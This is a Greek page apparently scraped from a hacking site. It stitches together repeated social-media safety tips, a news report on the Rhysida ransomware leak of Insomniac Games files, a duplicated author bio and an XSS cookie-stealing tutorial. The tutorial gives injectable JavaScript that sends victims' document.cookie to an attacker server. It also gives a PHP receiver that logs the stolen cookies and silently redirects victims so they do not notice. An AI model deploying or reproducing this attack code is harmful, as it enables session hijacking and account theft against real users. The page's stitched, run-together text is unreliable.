Δενπρέπει να λέτε σε κανέναν τον κωδικό πρόσβασης τουεικονικούσαςπροφίλ. Όποιος έχει πρόσβαση στο προφίλ σας έχειπλήρηέλεγχοτωνδεδομένωνπου εμφανίζονται στοπροφίλ σας.
Μην βάζετεφωτογραφίες στο προφίλ σας πουδείχνουνξεκάθαρατηντοποθεσία σας(ιδίωςτο σπίτι σας, το σχολείο σας ή μέρη που συχνάζετε). Είναιλιγότεροπιθανόνασας βρουνστηφύση.
Εάνλάβετε ένα προσβλητικό ή ανεπιθύμητο μήνυμα, αναφέρετέ το στηδιαδικασίακαταγγελιών τουιστότοπου κοινωνικής δικτύωσης που χρησιμοποιείτε ή στη Safeline. Συνήθως εκφράζεται με τη λέξη “αναφορά”.
Έχετεπάντα κατάνου ότι οι πληροφορίες που δημοσιεύετε στουςιστότοπους κοινωνικής δικτύωσης είναι ευρέως προσβάσιμες.Ακόμηκαι ανδιαγράψετε το προφίλ σας, πολλές από τις πληροφορίες δεν θααφαιρεθούν και μπορείνασυνεχίσουν να είναιδιαθέσιμεςαλλού στο Διαδίκτυο.
Λάβετευπόψη ότι ότανπροσθέτετεκάποιονστη λίστα φίλων σας (ότανεπιβεβαιώνετεένααίτημαφιλίας), το άτομο αυτό μπορείνα έχει πρόσβαση στα προσωπικά σαςδεδομένα,όπωςηφωτογραφίασαςκαιταστοιχείαεπικοινωνίαςπουεμφανίζονταιστοπροφίλσας.
Αφούδημιουργήσετετο εικονικό σας προφίλ,πρέπει να μεταβείτε στο μενού ρυθμίσεων απορρήτουκαι να αλλάξετε τις προεπιλεγμένες ρυθμίσεις.
Σοκαριστική Διαρροή: Περισσότερα από 1,3 Εκατομμύρια Αρχεία της Insomniac Games Διέρρευσαν
Περισσότερα από 1,3 εκατομμύρια αρχεία της Insomniac Games, η οποία ανήκει στη Sony (6758.T), συμπεριλαμβανομένων σχεδίων παιχνιδιών, προϋπολογισμών και πληροφοριών για ένα προσεχές παιχνίδι “Wolverine”, διέρρευσαν στο διαδίκτυο από την ομάδα Rhysida ransomware, όπως ανέφερε την Τρίτη η Bloomberg News.
Τα αρχεία δείχνουν ότι η ιαπωνική εταιρεία σχεδιάζει να κυκλοφορήσει αρκετά παιχνίδια εμπνευσμένα από τον κόσμο των Marvel την επόμενη δεκαετία, συμπεριλαμβανομένων του “Spider-Man 3” και εκείνων που βασίζονται σε Venom και X-Men, σύμφωνα με την αναφορά.
Το συμφωνητικό άδειας χρήσης μεταξύ της Insomniac και της Marvel φτάνει τα 621 εκατομμύρια δολάρια για την ανάπτυξη και την προώθηση των παιχνιδιών X-Men έως το 2035, πρόσθεσε η αναφορά.
Η Sony δεν ανταποκρίθηκε σε αίτημα σχολίου από το Reuters.
Η Rhysida ανακοίνωσε τη διαρροή στις 12 Δεκεμβρίου, λέγοντας ότι θα δημοπρατούσε τα δεδομένα για περίπου 2 εκατομμύρια δολάρια σε bitcoin, αλλά αργότερα δημοσίευσε τα δεδομένα την Τρίτη, σύμφωνα με την αναφορά.
Η διαρροή αποτελεί το τελευταίο περιστατικό στη βιομηχανία των παιχνιδιών, μετά τη διαρροή νωρίτερα εικόνων από το “Grand Theft Auto VI” της Take-Two Interactive Software (TTWO.O) πέρυσι, σε ό,τι αποτελεί μία από τις μεγαλύτερες διαρροές παιχνιδιών όλων των εποχών.
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.
Ασφαλής χρήση των συστημάτων ιστοσελίδων κοινωνικής δικτύωσης
Δενπρέπει να λέτε σε κανέναν τον κωδικό πρόσβασης τουεικονικούσαςπροφίλ. Όποιος έχει πρόσβαση στο προφίλ σας έχειπλήρηέλεγχοτωνδεδομένωνπου εμφανίζονται στοπροφίλ σας.
Μην βάζετεφωτογραφίες στο προφίλ σας πουδείχνουνξεκάθαρατηντοποθεσία σας(ιδίωςτο σπίτι σας, το σχολείο σας ή μέρη που συχνάζετε). Είναιλιγότεροπιθανόνασας βρουνστηφύση.
Εάνλάβετε ένα προσβλητικό ή ανεπιθύμητο μήνυμα, αναφέρετέ το στηδιαδικασίακαταγγελιών τουιστότοπου κοινωνικής δικτύωσης που χρησιμοποιείτε ή στη Safeline. Συνήθως εκφράζεται με τη λέξη “αναφορά”.
Έχετεπάντα κατάνου ότι οι πληροφορίες που δημοσιεύετε στουςιστότοπους κοινωνικής δικτύωσης είναι ευρέως προσβάσιμες.Ακόμηκαι ανδιαγράψετε το προφίλ σας, πολλές από τις πληροφορίες δεν θααφαιρεθούν και μπορείνασυνεχίσουν να είναιδιαθέσιμεςαλλού στο Διαδίκτυο.
Λάβετευπόψη ότι ότανπροσθέτετεκάποιονστη λίστα φίλων σας (ότανεπιβεβαιώνετεένααίτημαφιλίας), το άτομο αυτό μπορείνα έχει πρόσβαση στα προσωπικά σαςδεδομένα,όπωςηφωτογραφίασαςκαιταστοιχείαεπικοινωνίαςπουεμφανίζονταιστοπροφίλσας.
Αφούδημιουργήσετετο εικονικό σας προφίλ,πρέπει να μεταβείτε στο μενού ρυθμίσεων απορρήτουκαι να αλλάξετε τις προεπιλεγμένες ρυθμίσεις.
Στον παρακάτω κώδικα θα δείτε πως μπορείτε να κλέψετε cookies κάνοντας επιθέσεις xss.
Ας ρίξουμε μια ματιά στο πρώτο script. Αυτό είναι το script/κώδικας που κάνετε inject στην σελίδα και το στέλνετε στο θύμα σας…
<script>
var server="192.168.1.6"; //your server var phpfl= "recvCookie.php"; //your php file to reiceve the cookie var getArg="data"; //the argument that will handle the data var path = "http://"+server+"/"+phpfl+"?"+getArg+"="+document.cookie;
window.open(path,"_self");
</script>
Το <script> λέει στον browser του θύματος ότι ο παρακάτω κώδικας είναι της γλώσσας javascript και το </script> δείχνει στον browser που τελειώνει αυτός ο κώδικας.
Οι επόμενες τέσσερις γραμμές είναι δικές μας μεταβλητές για να μπορούμε να μην τα έχουμε όλα μπερδεμένα…
Η πρώτη μεταβλητή είναι ο δικός μας server ο όποιος θα δέχεται τα δεδομένα των cookies από τους χρήστες που θα ανοίγουν τον παραπάνω κώδικα στον browser τους.
Η δεύτερή γραμμή δείχνει που είναι το αρχείο που θα επεξεργάζεται τα δεδομένα των cookies και θα τα γράφει σε κάποιο αρχείο για να μπορούμε να τα δούμε εμείς αργότερα…
Η τρίτη γραμμή είναι το argument που θα σταλθούν τα δεδομένα. Για να το περιγράψω με τον απλό τρόπο. Είναι η μεταβλητή στον σερβερ μας. Εκεί θα πάνε τα δεδομένα πριν τα γράψουμε σε κάποιο αρχείο.
Η τελευταία μεταβλητή το μόνο που κάνει είναι να τα ενώνει όλα μαζί.
βάζει αρχικά το http:// μπροστά. ακολουθεί η διεύθυνση του server μας. Το αρχείο κλπ… μέχρι που στο τέλος υπάρχει και το document.cookie. Αυτό διαβάζει τα δεδομένα για τα cookies που είναι στον browser του θύματος.
Το αποτέλεσμά αυτής της μεταβλητής θα μοιάζει κάπως έτσι:
path=http://myserver.com?recvCookie.php?data=[Dedomena twn cookies edw]
Και έχουμε μια ακόμα εντολή… Αυτή η εντολή κάνει redirect το θύμα μας στον server μας και μάλιστα στο path…. Τα υπόλοιπα τα αναλαμβάνει το php αρχείο το όποιο είναι στον δικό μας server!
<?php $target_site = "http://192.168.1.6"; //redirect back the user! //http/https is required date_default_timezone_set("UTC"); $fl = fopen("data_logs.html","a");
Το <?php λέει στον server μας ότι ο παρακάτω κώδικας έχει γραφτεί σε γλώσσα php. To ?> λέει ότι εκεί τελειώνει ο παραπάνω κώδικας που ήταν σε php
$target_site είναι μια μεταβλητή που αποθηκεύει το site που έχουμε χακαρεί. Αυτό το αποθηκεύουμε εκεί για να κάνουμε redirect το θύμα μας πίσω στο κανονικό site όταν τσιμπήσει, με αυτόν τον τρόπο δεν θα καταλάβει καν τι έγινε (αν είναι άσχετος)
date_default_timezone_set(“UTC”);
κάνει ακριβώς αυτό που λέει :p Θα το χρειαστούμε για να ξέρουμε τι ώρα τσίμπησε το θύμα μας. Μπορείτε να το αλλάξετε να είναι στην Έλλαδα. Αντί για UTC βάλτε greece
$fl = fopen(“data_logs.html”,”a”);
Αυτή η εντολή ανοίγει ένα αρχείο με το όνομα data_logs.html. Αν δεν υπάρχει το δημιουργεί. Αν υπάρχει τότε πηγαίνει τον κέρσορα στο τέλος του αρχείου. Με αυτόν τον τρόπο δεν διαγράφονται δεδομένα από προηγούμενα θύματα. Για να γράψουμε κάτι σε αυτό το αρχείο το κάνουμε με την fopen. To $fl βάζει τα πράγματα στο αρχείο… δεν είναι μεταβλητή (όχι με την έννοια τις μεταβλητής βασικά)
$data = $_GET[“data”];
Αυτό δεν χρειαζόταν… Αλλά ας έχουμε τα πράγματα τακτοποιημένα… Αυτό εδώ πηγαίνει τα δεδομένα από την μεταβλητή (argument) data στην μεταβλητή $data.
$_GET[“data”];
Αυτό εδώ έχει τα δεδομένα που έστειλε το προηγούμενο script. Για να μην το καλούμε όλο αυτό τα βάλαμε στην μεταβλητή $data…
Η πρώτη γραμμή γράφει στο αρχείο ένα html tag το όποιο λέει να τυπώνει τα δεδομένα όπως ακριβώς του τα δίνουμε (με χαρακτήρες νέας γραμμής κλπ)
Η δεύτερή γραμμή γράφει στο αρχείο την ημερομηνία και την ώρα που το θύμα μας στάλθηκε σε αυτό το αρχείο από τον κώδικα μας.
Η τρίτη γραμμή γράφει στο αρχείο τα δεδομένα που έστειλε ο κώδικας που εκτελέστηκε στον υπολογιστή του θύματος (δηλαδή τα cookies)
H τέταρτη γραμμή γράφει:,”————————-” για να ξέρουμε που τελειώνουν τα δεδομένα. Το \n είναι χαρακτήρας νέας γραμμής, είναι σαν να πατάω enter σε ένα έγγραφό κειμένου δηλαδή.
header("Location: ".$target_site); die();
η πρώτη γραμμή κάνει redirect τον χρήστη μας πίσω στην σελίδα που χακάραμε, με αυτόν τον τρόπο κάνουμε λίγο καμουφλάζ στην επίθεση και δεν καταλαβαίνει κάτι…
die()
σταματάει να εκτελεί κώδικα php στον server. Δεν είναι απαραίτητο εδώ. Αλλά αν υπάρξει θέμα (πχ δεν μπορεί να γράψει τα δεδομένα στο αρχείο και καθυστέρηση πολύ να τελειώσει το θύμα μας μπορεί να καταλάβει ότι κάνουμε επίθεση. το die σταματάει αυτήν την διαδικασία… και το redirect γίνετε κανονικά)
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.